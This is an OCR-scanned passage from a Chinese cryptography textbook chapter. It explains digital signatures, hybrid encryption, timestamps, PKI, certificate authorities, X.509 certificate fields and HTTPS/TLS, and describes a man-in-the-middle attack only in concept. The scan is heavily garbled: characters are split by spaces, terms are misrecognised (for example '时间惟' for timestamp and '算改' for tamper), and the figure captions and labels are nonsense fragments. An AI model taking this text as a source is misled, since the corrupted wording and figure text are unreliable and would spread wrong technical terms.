信息 Hs; 将 接收 到 的 签名 信息 SA 用 用 户 A 的 公 钥 Kaa 解密 得 到 由 用 户 A 计算 出 的 数据 
摘要 , 记 为 HA。 

(6) 用 户 B 对 两 个 数据 摘要 及、 和 Hh 进行 比较 ,车 相同 , 则 证 明 信 息 发 送 过 程 中 未 发 
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生 任 何 改变 ; 若 不 同 , 则 有 人 进行 了 修改 。 

在 这 种 签名 机 制 中 ,用 户 B 完 全 可 以 相信 所 得 到 的 信息 一 定 是 用 户 A 发 送 过 来 的 , 同 
时 用 户 A 也 无 法 否认 发 送 过 信息 ,因此 是 一 种 安全 的 签名 技术 方案 。 

整个 过 程 使 用 了 3 对 密 钥 : 用 户 A 的 非 对 称 密 钥 Asa 和 开 As、 用 户 B 的 非 对 称 密 钥 
Kst 和 Kea 、A 随机 产生 的 对 称 密 钥 开 A。 其 中 用 户 A 的 非 对 称 密 钥 用 于 数字 签名 ,实现 用 
户 A 无 法 和 否认 发 送 过 信息 ; 用 户 B 的 非 对称 密 钥 利用 非 对 称 密 钥 难于 解密 的 优点 对 随机 
产生 的 对 称 密 钥 K 进行 加 密 、 解 密 , 保 证 对 称 密 钥 的 安全 分 发 ; 随机 产生 的 对 称 密 钥 K。 
利用 对 称 密 钥 加 密 速度 快 的 优点 实现 对 大 量 的 数据 进行 加 密 、 解 密 。 

混合 密 钥 算法 : 使 用 公 钥 算法 加 密 随 机 产生 的 对 称 密 钥 ,利用 公 钥 算法 难以 解密 的 优 
点 进行 对 称 密 钥 的 安全 分 发 ; 使 用 对 称 密 钥 加 密 速度 快 的 优点 加 密 传输 数据 ,实现 一 次 一 
密 , 保 证 信息 传输 保密 性 。 

混合 密 钥 算 法 是 目前 数据 加 解密 系统 普遍 采用 的 方法 ,必须 牢固 掌握 。 


2.6.2 时 间 戳 


在 交易 文件 中 ,时 间 是 十 分 重要 的 因素 ,需要 对 电子 交易 文件 的 日 期 和 时 间 采 取 安 全 措 
施 ,以 防 文件 被 伪造 或 自 改 。 时 间 蕉 服 务 是 计算 机 网 络 上 的 安全 服务 项 目 , 由 专门 机 构 提 供 。 

时 间 惟 是 一 个 经 加 密 后 形成 的 凭证 文档 , 它 包括 以 下 3 部 分 : 

(1) 需要 加 时 间 惟 的 文件 的 数据 摘要 (digest) ; 

(2) ETS(Electronic Timestamp Server, 电 子 时 间 戳 服务 器 ) 收 到 文件 的 日 期 和 时 间 ， 

(3) ETS 的 数字 签名 。 

时 间 戳 产生 的 过 程 为 : 用 户 首先 将 需要 加 时 间 戳 的 文件 用 Hash 编码 加 密 形 成 摘要 ， 
然后 将 该 摘要 发 送 到 DTS(Digital Time-stamp Service ,数字 时 间 截 服务 ) 机 构 ,DTS 在 加 入 
了 收 到 文件 摘要 的 日 期 和 时 间 信 息 后 再 对 该 文件 加 密 ( 数 字 签名 ) ,最 后 送 回 用 户 。 

DTS 工作 过 程 : 加 密 时 将 摘要 信息 归并 到 二 又 树 的 数据 结构 ,再 将 二 又 树 的 根 值 发 表 
在 报纸 上 ,这样 便 有 效 地 为 文件 发 表 时 间 提 供 了 佐证 。 注 意 ,书面 签署 文件 的 时 间 是 由 签署 
人 自己 写 上 的 ,而 数字 时 间 截 则 不 然 , 它 是 认证 单位 DTS 加 上 的 ,以 DTS 收 到 文件 的 时 间 
为 依据 。 因 此 ,时 间 惟 也 可 以 作为 科学 发 明文 献 的 时 间 认 证 。 


2.7 公 和 钥 基 础 设施 


越 来 越 多 的 企业 网 和 电子 商务 使 用 Internet 作为 通信 基础 平台 ,但 都 面临 一 个 问题 ,就 
是 如 何 建 立 相 互 之 间 的 信任 关系 以 及 如 何 保证 信息 的 真实 性 、 完 整 性 、 机 密 性 和 不 可 否认 
性 。PKI(Public Key Infrastructure, 公 钥 基 础 设施 ) 是 解决 这 一 系列 问题 的 技术 基础 。 


2.7.1 了 PKI 定 义 


AB 通信 模型 存在 公 钥 替换 问题 : Alice 使 用 自己 的 私 钥 签名 和 Bob 通信 ,实现 身份 认 
证 。 但 敌手 Trudy 出 现 了 ,他 偷偷 使 用 了 Alice 的 计算 机 ,用 自己 的 公 钥 换 走 了 Bob 的 公 
钥 。 此 时 ,Alice 实际 拥有 的 是 Trudy 的 公 钥 ,但 是 还 以 为 这 是 Bob 的 公 钥 。 因 此 ,Trudy 就 
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可 以 冒充 Bob, 用 自己 的 私 钥 进行 数字 签名 , 写 信 给 Alice, 让 Alice 用 假 的 Bob 公 钥 进行 解密 。 

Alice 如 何 确定 公 钥 是 否 真 的 属于 Bob? 解决 方法 是 引入 第 三 方 认证 机 构 一 一 认证 中 
心 CCertificate Authority,CA) 。 方 法 是 要 求 Bob 去 找 CA 为 公 钥 做 认证 : CA 用 自己 的 私 
钥 , 对 Bob 的 公 钥 和 一 些 相 关 信息 一 起 加 密 . 生 成 数字 证 书 (Digital Certificate) 。 

Bob 拿 到 数字 证 书 以 后 再 给 Alice 写 信 ,只 要 在 签名 的 同时 , 附 上 数字 证 书 就 可 以 了 。 
Alice 收 信 后 ,用 CA 的 公 钥 解 开 数字 证 书 ,就 可 以 拿 到 Bob 真实 的 公 钥 了 ,然后 就 能 证 明 数 
字 签 名 是 否 真 的 是 Bob 签 的 。 这 是 因为 CA 以 自己 的 信誉 证 明 公 钥 的 真实 性 ( 公 钥 持 有 人 
身份 真实 ) ,这 就 和 我 们 使 用 身份 证 证 明 自己 一 样 ,公安 部 门 相当 于 CA 。 

必要 时 我 们 可 以 要 求 CA 提供 数字 证 书 的 真实 性 证 明 , 就 像 坐 飞机 、 火 车 进行 安检 一 
样 ,警察 会 比 对 我 们 身份 证 是 否 和 原始 身份 证 数据 库 一致 。 

与 此 类 似 ,网 络 安全 中 身份 验证 和 密 钥 协 商 要 求 的 前 提 是 合法 的 服务 器 掌握 着 对 应 的 
私 钥 。 但 服务 器 公 钥 并 不 包含 服务 器 的 信息 ,RSA 算法 无 法 确保 服务 器 身份 的 合法 性 , 存 
在 中 间 人 攻击 和 信息 抵赖 的 安全 隐患 ,如 图 2-19 所 示 。 


实际 公 钥 
Pub_M 





实际 公 钥 
pub_S 







中 间 人 攻击 


银行 卡 … 银行 卡 … 


信息 抵 加 人 


C : 你 为 什么 器 人 …… 
S : 刚刚 说 话 的 不 是 本 人 


图 2-19 中 间 人 攻击 和 信息 抵赖 


(1) 客户 端 C 和 服务 器 S 进行 通信 ,中 间 节 点 M 截获 了 二 者 的 通信 ; 

(2) 中 间 节 点 M 自己 计算 产生 一 对 公 钥 pub_M 和 私 钥 pri_M; 

(3) C 向 S 请 求 公 钥 时 ,M 把 自己 的 公 钥 pub_M 发 给 了 C; 

(4) C 使 用 公 钥 pub_M 加 密 的 数据 能 够 被 M 解密 ,因为 M 掌握 对 应 的 私 钥 pri_M ,而 
C 无 法 根据 公 钥 信息 判断 服务 器 的 身份 ,从 而 C 和 M 之 间 建 立 了 虚假 的 “可 信 ” 加 密 连 接 ; 

(5) 中 间 节 点 M 和 服务 器 S 之 间 再 建立 合法 的 连接 ,因此 C 和 S 间 通信 被 M 完全 掌 
握 ,M 可 以 进行 信息 的 窃听 、 算 改 等 操作 。 

另外 ,服务 器 也 可 以 对 自己 的 发 出 的 信息 进行 否认 ,不 承认 相关 信息 是 自己 发 出 。 

解决 上 述 身份 验证 问题 的 关键 是 确保 获取 的 公 钥 途径 是 合法 的 ,能 够 验证 服务 器 的 身 
份 信息 ,为 此 需要 引入 权威 的 第 三 方 机 构 CA。CA 负责 核实 公 钥 的 拥有 者 的 信息 ,并 颁发 
认证 证 书 , 同 时 能 够 为 使 用 者 提供 证 书 验 证 服务 , 即 PKI 体系。 

PKI 的 基本 原理 为 : CA 负责 审核 信息 ,然后 对 关键 信息 利用 私 钥 进 行 签名 ,公开 对 应 
的 公 钥 ,客户 端 可 以 利用 公 钥 验证 签名 。 

PKI 就 是 利用 公 钥 理论 和 技术 建立 的 ,为 网 络 的 数据 和 其 他 资源 提供 信息 安全 服务 的 
基础 设施 。 从 广义 上 说 ,所 有 提供 公 钥 加 密 和 数字 签名 服务 的 系统 都 可 以 叫做 PKI 系 统 。 

PKI 的 实质 是 利用 一 对 互相 匹配 的 密 钥 进行 加 密 、 解 密 。PKI 的 主要 目的 是 通过 自动 
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管理 密 钥 和 证 书 ,为 用 户 建立 起 一 个 安全 的 网 络 运行 环境 ,使 用 户 可 以 在 多 种 应 用 环境 下 方 
便 地 使 用 加 密 和 数字 签名 技术 ,从 而 保证 网 络 通信 中 数据 的 机 密 性 、 完 整 性 有效 性 。 

一 个 有 效 的 PKI 系统 在 提供 安全 性 服务 的 同时 ,在 应 用 上 还 应 该 具有 简单 性 、 透 明 性 ， 
即 用 户 在 获得 加 密 和 数字 签名 服务 时 ,不 需要 详细 了 解 PKI 内 部 的 实现 原理 和 具体 操作 ， 
如 PKI 怎样 管理 证 书 和 密 钥 等 。 

目前 被 广泛 认可 的 PKI 是 以 X. 509 第 三 版 为 基础 的 结构 。PKI 所 带 来 的 保密 性 、 完 整 
性 .不 可 否认 性 的 重要 意义 日 益 突出 。 

PKI 的 概念 和 内 容 是 动态 的 ,不 断 发 展 的 ,完整 的 PKI 系统 必须 具有 权威 认证 机 关 
(CA) ,数字 证 书库 、 密 钥 备 份 及 恢复 系统 \ 证 书 作废 系统 等 基本 组 成 部 分 ,构建 PKI 也 将 围 
绕 着 五 大 系统 来 着 手 。 

认证 机 构 (CA): 即 数字 证 书 的 申请 及 签发 机 关 ,CA 必须 具备 权威 性 这 一 特征 , 它 是 
PKI 的 核心 ; 

数字 证 书库 : 用 于 存储 已 签发 的 数字 证 书 及 公 钥 ,用 户 可 由 此 获得 所 需 的 其 他 用 户 的 
证 书 及 公 钥 ; 

密 钥 备份 及 恢复 系统 : 如 果 用 户 丢 失 了 用 于 解密 数据 的 密 钥 , 则 数据 将 无 法 被 解密 ,这 
将 造成 合法 数据 丢失 。 为 避免 这 种 情况 ,PKI 提供 备份 与 恢复 密 钥 的 机 制 。 但 必须 注意 , 密 
钥 的 备份 与 恢复 必须 由 可 信 的 机构 来 完成 ; 并 且 , 密 钥 备份 与 恢复 只 能 针对 解密 密 钥 ,签名 
私 钥 为 确保 其 唯一 性 而 不 能 够 作 备 份 。 

证 书 作 废 系统 : 证 书 作废 处 理 系统 是 PKI 的 一 个 必 备 的 组 件 。 与 日 常生 活 中 的 各 种 身 
份 证 件 一 样 ,证 书 有 效 期 以 内 也 可 能 需要 作废 ,原因 可 能 是 密 钥 媒 体 丢 失 或 用 户 身份 变更 
等 。 为 实现 这 一 点 ,PKI 必须 提供 作废 证 书 的 一 系列 机 制 。 

应 用 接口 (APID : PKI 的 价值 在 于 使 用 户 能 够 方便 地 使 用 加 密 、 数 字 签名 等 安全 服务 ， 
因此 一 个 完整 的 PKI 必须 提供 良好 的 应 用 接口 系统 ,使 得 各 种 各 样 的 应 用 能 够 以 安全 一 
致 .可 信 的 方式 与 PKI 交互 ,确保 安全 网 络 环境 的 完整 性 和 易 用 性 。 客 户 端 软件 的 安装 就 
可 使 客户 方便 地 使 用 PKI 系统 。 

对 于 构建 密码 服务 系统 的 核心 内 容 是 如 何 实现 密 钥 管理 , 公 钥 体制 涉及 一 对 密 钥 ( 即 私 
钥 和 公 钥 ), 私 钥 只 由 用 户 独立 掌握 ,无 须 在 网 上 传输 ,而 公 钥 则 是 公开 的 ,需要 在 网 上 传送 , 故 
公 钥 体制 的 密 钥 管理 主要 是 针对 公 钥 的 管理 问题 ,目前 较 好 的 解决 方案 是 数字 证 书 机 制 。 


2.7.2 认证 中 心 


认证 中 心 在 网 络 通信 认证 中 具有 特殊 的 地 位 。 例 如 ,在 进行 电子 商务 时 ,认证 中 心 是 为 
了 从 根本 上 保障 电子 商务 顺利 进行 而 设立 的 ,主要 是 解决 电子 商务 活动 中 参与 各 方 的 身份 、 
资质 的 认定 ,维护 交易 活动 的 安全 。 

CA 机 构 又 称 为 证 书 授 证 (Certificate Authority) 中 心 , 作 为 电子 商务 交易 中 受信 任 和 
具有 权威 性 的 第 三 方 ,承担 公 钥 体 系 中 公 钥 的 合法 性 检验 的 责任 。 

CA 中 心 为 每 个 使 用 公开 密 钥 的 客户 发 放 数字 证 书 , 数 字 证 书 的 作用 是 证 明证 书 中 列 
出 的 客户 合法 拥有 证 书 中 列 出 的 公开 密 钥 。CA 机 构 的 数字 签名 使 得 第 三 者 不 能 伪造 和 算 
改 证 书 。 它 负责 产生 、 分 配 并 管理 所 有 参与 网 上 信息 交换 各 方 所 需 的 数字 证 书 , 因 此 是 安全 
电子 信息 交换 的 核心 。 


第 2 章 密码 学 基础 77 





CA 是 提供 身份 验证 的 第 三 方 机 构 , 通 常 由 一 个 或 多 个 用 户 信 任 的 组 织 实体 组 成 。 例 
如 , 持 卡 人 要 与 商家 通信 , 持 卡 人 从 公开 媒体 上 获得 了 公开 密 钥 , 但 无 法 确定 不 是 冒充 的 ,于 
是 请 求 CA 对 商家 认证 。 此 时 ,CA 对 商家 进行 验证 ,其 过 程 由 持 卡 人 一 商家 转变 为 持 卡 人 一 
CA; CA 一 商家 。 证 书 一 般 包含 拥有 的 标识 名 称 和 公 钥 ,并 且 由 CA 进行 数字 签名 。 

CA 的 功能 主要 有 接收 注册 申请 、 处 理 、 批 准 / 拒 绝 请 求 .颁发 证 书 。 

在 实际 动作 中 ,CA 也 可 由 大 家 都 信任 的 一 方 担当 ,例如 ,在 客户 、 商 家 、 银 行 三 角 关 系 
中 ,客户 使 用 的 是 由 某 个 银行 发 的 卡 , 而 商家 又 与 此 银行 有 业务 关系 (有 账号 )。 在 此 情况 
下 ,客户 和 商家 都 信任 该 银行 ,可 由 该 银行 担当 CA 角色 ,接收 和 处 理 客户 证 书 的 验证 请 求 。 
又 如 ,对 商家 自己 发 行 的 购物 卡 , 则 可 由 商家 自己 担当 CA 角色 。 

如 何 知道 在 每 次 通信 或 交易 中 所 使 用 的 密 钥 对 实际 上 就 是 用 户 的 密 钥 对 呢 ? 这 就 需要 
一 种 认证 公用 密 钥 和 用 户 之 间 关 系 的 方法 。 

解决 这 一 问题 的 方法 是 引入 一 种 叫做 证 书 或 凭证 的 特种 签名 信息 。 数 字 签 名 很 重要 的 
机 制 是 数字 证 书 (Digital Certificat ,或 Digital ID) ,数字 证 书 又 称 为 数字 凭证 ,是 用 电子 手段 
来 证 实 一 个 用 户 的 身份 和 对 网 络 资源 访问 的 权限 。 在 网 上 的 电子 交易 中 ,如 双方 出 示 了 各 
自 的 数字 凭证 ,并 用 它 来 进行 交易 操作 ,那么 双方 都 可 不 必 为 对 方 身份 的 真 伪 担心 。 数 字 凭 
证 可 用 于 电子 邮件 .电子 商务 、 群 件 和 电子 基金 转移 等 各 种 用 途 。 
数字 证 书 是 一 个 经 证 书 授权 中 心 数字 签名 的 包含 公开 密 钥 拥 有 者 信息 以 及 公开 密 钥 的 
文件 。 人 们 可 以 在 互联 网 交往 中 用 它 来 识别 对 方 的 身份 。 在 数字 证 书 认证 的 过 程 中 ,证 书 
认证 中 心 (CA) 作 为 权威 的 ` 公 正 的 .可 信赖 的 第 三 方 , 其 作用 是 至 关 重 要 的 。 数 字 证 书 由 独 
立 的 证 书 发 行 机 构 发 布 。 数 字 证 书 各 不 相同 ,每 种 证 书 可 提供 不 同 级 别 的 可 信和 度 。 

公开 密 钥 技 术 解 决 了 密 钥 发 布 的 管理 问题 。 最 简单 的 数字 证 书包 含 一 个 公开 密 钥 、 名 
称 以 及 证 书 授 权 中 心 的 数字 签名 。 一 般 情 况 下 ,数字 证 书 还 包括 密 钥 的 有 效 时 间 、 发 证 机 关 
的 名 称 和 证 书 的 序列 号 等 信息 ,证 书 的 格式 遵循 ITU-T X. 509 国际 标准 。 

(1) 版 本 号 : 用 于 区 分 X. 509 的 不 同 版 本 。 

(2) 序列 号 : 由 同一 发 行者 (CA) 发 放 的 每 个 证 书 的 序列 号 是 唯一 的 。 

(3) 签名 算法 : 签署 证 书 所 用 的 算法 及 其 参数 。 

(4) 发 行者 : 指 建立 和 签署 证 书 的 CA 的 X. 509 名 字 。 

(5) 有 效 期 : 包括 证 书 有 效 期 的 起 始 时 间 和 终止 时 间 。 

(6) 主体 名 : 指证 书 持 有 者 的 名 称 及 有 关 信 息 。 

(7) 公 钥 : 有 效 的 公 钥 以 及 其 使 用 方法 。 

(8) 发 行者 ID: 任 选 的 ,名 字 唯 一 标识 证 书 的 发 行者 。 

(9) 主体 ID: 任 选 的 ,名 字 唯 一 标识 证 书 的 持 有 者 。 

(10) 扩展 域 : 添加 的 扩充 信息 。 

(11) 认证 机 构 的 签名 : 用 CA 私 钥 对 证 书 的 签名 。 

数字 证 书 有 着 广泛 的 现实 作用 ,分 为 以 下 3 种 类 型 : 

(1) 个 人 凭证 (Personal Digital ID) , 它 仅仅 为 某 一 个 用 户 提 供 凭 证 ,以 帮助 个 人 进行 安 
全 交易 操作 。 个 人 身份 的 数字 凭证 通常 是 安装 在 客户 端的 浏览 器 中 的 ,并 通过 安全 的 电子 
邮件 来 进行 交易 操作 。 

(2) 企业 凭证 (Server ID), 它 通常 为 网 上 某 个 Web 服务 器 提供 凭证 ,拥有 Web 服务 器 
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的 企业 就 可 以 用 具有 凭证 的 Web 站 点 来 进行 安全 电子 交易 。 有 凭证 的 Web 服务 器 会 自动 
地 将 其 与 客户 端 Web 浏览 器 通信 的 信息 加 密 。 

(3) 软件 (开发 者 ) 凭 证 (Developer ID) , 它 通 常 为 Internet 中 被 下 载 的 软件 提供 凭证 ， 
该 凭证 用 于 微软 公司 的 Authenticode 技术 中 ,以 使 用 户 在 下 载 软件 时 能 获得 所 需 的 信息 。 

数字 证 书 的 工作 过 程 如 下 : 

用 户 首 先 产 生 自己 的 密 钥 对 ,并 将 公共 密 钥 及 部 分 个 人 身份 信息 传送 给 认证 中 心 。 认 
证 中 心 在 核实 身份 后 ,将 执行 一 些 必要 的 步骤 ,以 确信 请 求 确实 由 用 户 发 送 而 来 ,然后 ,认证 
中 心 将 发 给 用 户 一 个 数字 证 书 ,该 证 书 内 包含 用 户 的 个 人 信息 和 他 的 公 钥 信息 ,同时 还 附 有 
认证 中 心 的 签名 信息 。 之 后 用 户 就 可 以 使 用 自己 的 数字 证 书 进行 相关 的 各 种 活动 了 。 

网 络 的 每 个 用 户 必须 知道 CA 公 钥 ,这 就 使 任何 一 个 想 验证 证 书 的 人 能 采用 用 于 验证 上 
述 信 息 和 数字 证 书 的 相同 程序 。CA 的 公用 密 钥 以 证 书 格式 提供 ,因而 它 也 是 可 以 验证 的 。 

CA 签发 并 管理 正式 使 用 公用 密 钥 与 用 户 相关 联 的 证 书 。 证 书 只 在 某 一 时 间 内 有 效 ， 
因而 CA 会 保存 一 份 有 效 证 书 及 其 有 效 期 清单 。 有 时 ,证 书 或 许 要 求 及 早 废除 ,因而 CA 会 
保存 一 份 废除 的 证 书 有 及 有 效 证 书 的 清单 。CA 把 其 有 效 证 书 、 废 除 证 书 或 过 期 证 书 的 清 
单 提供 给 任何 一 个 要 获得 这 种 清单 的 人 。 

如 图 2-20 所 示 ,CA 使 用 流程 为 : 











































































































签名 
Sig=Enc_by_private_CA[Hash(INFO)] 
审核 明文 信息 -INFO 
。 签发 机 构 CA_qq 
(2) 审核 信息 “ 0 
“扩展 信息 : … 
CA 。 域 名 : cdn.qq.com 
下 。 申 请 者 : TEG/APD 
。 公 钥 : pub_server 
(1) 申请 认证 (证 书 ) 
。 计 - = ni 
ZI Re 
i 9) 等 发 证 书 “用 CA 证 书 的 公 钥 解 密 签 名 
“ 确认 中 请 信息 D_pem=Dec_by_pub_CA(Sig) 
域名 /申请 者 / 公 铀 了 
。 生 成 请 求 文件 .csr D_cal==D_pem 
不 含有 私 钥 信息 . 验证 其 他 信息 
域名 /有 效 时 间 / 是 否 吊销 
1 (5) 验证 证 书 
(4) 返回 证 书 
server 所 | client 
(6) 密 钥 协商 


图 2-20 CA 使 用 流程 


(1) 申请 认证 (证 书 )。 服 务 器 S 向 第 三 方 机 构 CA 提交 公 钥 、 组 织 信 息 、 个 人 信息 ( 域 
名 ) 等 信息 并 申请 认证 ; 

(2) 审核 信息 。CA 通过 线 上 、 线 下 等 多 种 手段 验证 申请 者 提供 信息 的 真实 性 ,如 组 织 
是 否 存 在 ,企业 是 否 合法 ,是 否 拥有 域名 的 所 有 权 等 ; 
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(3) 签发 证 书 。 如 信息 审核 通过 ,CA 会 向 申请 者 签发 认证 文件 一 一 证 书 。 

证 书包 含 以 下 信息 : 申请 者 公 钥 、 申 请 者 的 组 织 信息 和 个 人 信息 、 签 发 机 构 CA 的 信 
息 、 有 效 时 间 ,证 书 序列 号 等 信息 的 明文 ,同时 包含 一 个 签名 ; 

签名 的 产生 算法 : 首先 使 用 Hash 函数 计算 公开 的 明文 信息 的 信息 摘要 ,然后 采用 CA 
的 私 钥 对 信息 摘要 进行 加 密 , 密 文 即 签名 ; 

(4) 返回 证 书 。 客 户 端 C 向 S 发 出 请 求 时 ,S 返回 证 书 文件 ; 

(5) 验证 证 书 。C 读 取 证 书 中 相关 的 明文 信息 ,采用 相同 的 Hash 也 数 计算 得 到 信息 摘 
要 ,然后 ,利用 对 应 CA 的 公 钥 解密 签名 数据 ,对 比 证 书 的 信息 摘要 ,如 果 一 致 , 则 可 以 确认 
证 书 的 合法 性 , 即 公 钥 合 法 ; C 然后 验证 证 书 相关 的 域名 信息 有效 时 间 等 信息 ; 

客户 端 会 预先 内 置信 任 CA 的 证 书信 息 ( 包 含 公 钥 ) ,如 果 CA 不 被 信任 , 则 找 不 到 对 应 
CA 的 证 书 ,证书 也 会 被 判定 非法 。 

在 这 个 过 程 中 应 注意 几 点 : 

。 证 书 一 公 钥 十 申请 者 与 颁发 者 信息 十 签名 ; 

。 申请 证 书 不 需要 提供 私 钥 ,确保 私 钥 永 远 只 能 由 服务 器 掌握 ; 

。 证 书 的 合法 性 仍 依赖 于 非 对 称 加 密 算 法 ,证 书 主要 是 增加 了 服务 器 信息 以 及 签名 ; 

。 内 置 CA 对 应 的 证 书 称 为 根 证 书 ,颁发 者 和 使 用 者 相同 ,自己 为 自己 签名 , 即 自 签名 

证 书 。 

(6) 密 钥 协商 。C 和 S 协商 对 称 密 钥 。 

下 面 看 一 个 应 用 数字 证 书 的 实例 : https 协议 。 

超 文本 传输 协议 http 协议 被 用 于 在 浏览 器 和 网 站 服务 器 之 间 传 递 信息 ,http 协议 以 明 
文 方式 发 送 内 容 , 不 提供 任何 方式 的 数据 加 密 , 如 果 攻 击 者 截取 了 浏览 器 和 网 站 服务 器 之 间 
的 传输 报 文 ,就 可 以 直接 读 懂 其 中 的 信息 ,因此 ,http 协议 不 适合 传输 一 些 敏感 信息 ,例如 
信用 卡号 .密码 等 支付 信息 。 

为 了 消除 http 协议 的 这 一 缺陷 ,需要 使 用 另 一 种 协议 : 安全 超 文 本 传输 协议 (Secure 
Hypertext Transfer Protocol)https。https 在 http 的 基础 上 加 入 了 SSL 协议 ,SSL 依靠 证 
书 来 验证 服务 器 的 身份 ,并 为 浏览 器 和 服务 器 之 间 的 通信 加 密 ,确保 数据 传输 的 安全 。 

https 能 够 加 密 信 息 ,以 免 敏感 信息 被 第 三 方 获取 ,所 以 很 多 银行 网 站 或 电子 邮箱 等 安 
全 级 别 较 高 的 服务 都 会 采用 https 协议 ,百度 .谷歌 .淘宝 等 网 站 都 已 经 使 用 了 https 进行 保 
护 ,特征 是 浏览 器 左上 角 已 经 全 部 出 现 了 一 把 绿色 锁 。iOS 9 系统 默认 把 所 有 的 http 请 求 
都 改 为 https 请 求 。 现 代 互 联网 正在 逐渐 进入 全 网 https 时 代 。 

https 通过 在 http 上 建立 加 密 层 ,使 用 安全 套 接 字 层 (SSL) 对 传输 数据 进行 加 密 , 用 于 
在 客户 计算 机 和 服务 器 之 间 交 换 信息 。 主 要 作用 可 以 分 为 两 种 : 一 种 是 建立 一 个 信息 安全 
通道 ,来 保证 数据 传输 的 安全 ; 另 一 种 就 是 确认 网 站 的 真实 性 。 

简单 来 说 ,https 是 http 的 安全 版 ,是 使 用 TLS/SSL 加 密 的 http 协议 ,如 图 2-21 所 示 。 
http 协议 采用 明文 传输 信息 ,存在 信息 窃听 、 信 息 算 改 、 信 息 劫持 的 风险 ; 而 https 协议 具有 
身份 验证 、 信 息 加 密 和 完整 性 校 验 的 功能 ,采用 密 文 传输 信息 ,可 以 避免 此 类 问题 发 生 。 

SSL(Secure Sockets Layer, 安全 套 接 层 ) 及 其 继任 者 传输 层 安 全 (Transport Layer 
Security,TLS) 是 为 网 络 通信 提供 安全 及 数据 完整 性 的 一 种 安全 协议 。TLS 与 SSL 在 传输 
层 对 网 络 连 接 进 行 加 密 。 
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HTTPS = HTTP 中 TLS/SSL 
1 HTTP | 
! 信息 兴 听 信息 加 密 ~ 1 
MEE { 信息 警 改 za | | 
de 信和 村。 稀 从 风 一 | 
层次 风险 优势 


图 2-21 https 协议 


https 协议 的 主要 功能 基本 都 依赖 于 TLS/SSL 协议 。TLS/SSL 是 介 于 TCP 和 http 
之 间 的 一 层 安 全 协议 ,不 影响 原 有 的 TCP 协议 和 http 协议 ,所 以 使 用 https 基本 上 不 需要 
对 http 页 面 进 行 太 多 的 改造 。 

如 图 2-22 所 示 ,TLS/SSL 的 功能 实现 主要 依赖 于 3 类 基本 算法 : Hash 函数 算法 、 对 称 
加 密 算法 、 非 对 称 加 密 算法 。 其 利用 非 对 称 加 密 算法 实现 身份 认证 和 密 钥 协 商 ,对 称 加 密 算 
法 采用 协商 的 密 钥 对 数据 加 密 , 基 于 Hash 函数 验证 信息 的 完整 性 。 
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| 1 1 1 1 ! 
1 1 1 1 1 





身份 验证 
密 钥 协 商 











图 2-22 TLS/SSL 的 功能 实现 


常见 的 Hash 函数 有 MD5、SHA1、SHA256 ,该 类 函数 特点 是 函数 单 向 不 可 逆 、 对 输入 
非常 敏感 .输出 长 度 固定 ,针对 数据 的 任何 修改 都 会 改变 Hash 函数 的 结果 ,用 于 防止 信息 
算 改 并 验证 数据 的 完整 性 ; 对 称 加 密 算法 常见 的 有 AES-CBC、DES、3DES、AES-GCM 等 ， 
相同 的 密 钥 可 以 用 于 信息 的 加 密 和 解密 ,掌握 密 钥 才能 获取 信息 ,能 够 防止 信息 窃听 ,通信 
方式 是 1 对 1; 非 对 称 加 密 即 常见 的 RSA 算法 ,还 包括 ECC、DH 等 算法 ,算法 特点 是 , 密 钥 
成 对 出 现 , 公 钥 加 密 的 信息 只 能 私 钥 解 开 , 私 钥 加 密 的 信息 只 能 公 钥 解 开 。 因 此 掌握 公 钥 的 
不 同 客户 端 之 间 不 能 互相 解密 信息 ,只 能 和 掌握 私 钥 的 服务 器 进行 加 密 通信 ,服务 器 可 以 实 
现 1 对 N 的 通信 ,客户 端 也 可 以 用 来 验证 掌握 私 钥 的 服务 器 身份 。 

在 信息 传输 过 程 中 ,Hash 函数 不 能 单独 实现 信息 防臭 改 ,因为 在 明文 传输 中 ,中 间 人 
可 以 修改 信息 之 后 重新 计算 数据 摘要 ,因此 需要 对 传输 的 信息 以 及 数据 摘要 进行 加 密 ; 对 
称 加 密 的 优势 是 信息 传输 1 对 1, 需 要 共享 相同 的 密码 ,密码 的 安全 是 保证 信息 安全 的 基 
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础 ,服务 器 和 N 个 客户 端 通信 ,需要 维持 N 个 密码 记录 , 且 缺 少 修改 密码 的 机 制 ; 非 对 称 加 
密 的 特点 是 信息 传输 1 对 N, 服 务 器 只 需要 维持 一 个 私 钥 就 能 够 和 多 个 客户 端 进行 加 密 通 
信 , 但 服务 器 发 出 的 信息 能 够 被 所 有 的 客户 端 解密 , 且 该 算法 的 计算 复杂 ,加密 速 度 慢 。 

结合 3 类 算法 的 特点 ,TLS 的 基本 工作 方式 是 : 客户 端 使 用 非 对 称 加 密 与 服务 器 进行 
通信 ,实现 身份 验证 并 协商 对 称 加 密使 用 的 密 钥 ,然后 对 称 加 密 算法 采用 协商 密 钥 对 信息 以 
及 数据 摘要 进行 加 密 通 信 , 不 同 的 节点 之 间 采 用 的 对 称 密 钥 不 同 ,从 而 可 以 保证 信息 只 能 通 
信 双 方 获取 。 

https 通常 只 要 求 服务 器 有 一 个 证 书 。 主 要 解决 了 以 下 问题 : 

(1) 保证 服务 器 就 是 他 声称 的 服务 器 (信任 主机 的 问题 )。 采 用 https 的 服务 器 必须 从 
CA 申请 一 个 用 于 证 明 服务 器 用 途 类 型 的 证 书 。 该 证 书 只 有 用 于 对 应 的 服务 器 的 时 候 , 客 
户 机 才 信 任 此 主机 。 客 户 通过 信任 该 证 书 , 从 而 信任 了 该 主机 。 其 实 这 样 做 效率 很 低 ,但 是 
银行 更 注重 安全 。 所 以 目前 所 有 的 银行 系统 网 站 ,关键 部 分 应 用 都 是 https 的 。 

(2) 服务 端 和 客户 端 之 间 的 所 有 通信 ,都 是 加 密 的 ,防止 通信 过 程 中 数据 的 泄密 和 被 算 
改 。 具 体 来 讲 , 就 是 客户 端 产生 一 个 对 称 密 钥 ,通过 服务 器 的 证 书 来 交换 对 称 密 钥 ; 接 下 来 
所 有 的 信息 往来 就 都 是 加 密 的 。 第 三 方 即使 截获 ,也 没有 任何 意义 。 因 为 他 没有 密 钥 。 当 
然 算 改 也 就 没有 什么 意义 了 。 

https 在 对 客户 端 有 安全 要 求 的 情况 下 ,也 要 求 客户 端 必须 有 一 个 证 书 。 

(1) 这 里 客户 端 证 书 , 其 实 就 类 似 表 示 个 人 信息 的 时 候 , 除 了 用 户 名 /密码 ,还 有 一 个 
CA 认证 过 的 身份 。 因 为 个 人 证 书 一 般 来 说 是 别人 无 法 模拟 的 ,所 有 这 样 能 够 更 进一步 确 
认 自己 的 身份 。 

